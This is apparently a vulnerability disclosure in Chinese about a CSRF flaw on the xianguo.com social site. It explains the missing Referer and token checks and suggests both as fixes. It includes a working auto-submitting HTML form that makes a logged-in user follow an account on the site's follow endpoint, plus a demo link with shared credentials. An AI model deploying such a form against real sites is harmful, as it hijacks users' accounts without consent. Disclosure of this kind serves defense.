鮮果網(wǎng)某處CSRF漏洞，可能導(dǎo)致蠕蟲蔓延，在未經(jīng)用戶同意的情況下發(fā)布文字、加關(guān)注等等！

詳細(xì)說明：在接受POST和GET的信息的時候，未對POST來路(Referer)進(jìn)行驗(yàn)證，同時也沒有在POST的信息中加token驗(yàn)證信息的正確性，導(dǎo)致漏洞產(chǎn)生。

演示地址：http://in.imlonghao.com/WooYun-XXXXX/ (用戶名/密碼：imlonghao)

登錄狀態(tài)下訪問，會自動發(fā)一條名為Hello World的微博，并會關(guān)注一個用戶。

漏洞地址：http://xianguo.com/beings/follow

<html>

<body>

<form id="imlonghao" name="imlonghao" action="http://xianguo.com/beings/follow" method="post">

<input type="text" name="beingsIds" value="1378148" />

<input type="text" name="parentId" value="0" />

<input type="text" name="ftype" value="0" />

</form>

<script>

document.imlonghao.submit();

</script>

</body>

</html>

接口返回信息

效果

[[97443]]

【發(fā)文字】

修復(fù)方案：

檢查POST來路Referer

在POST的信息中加token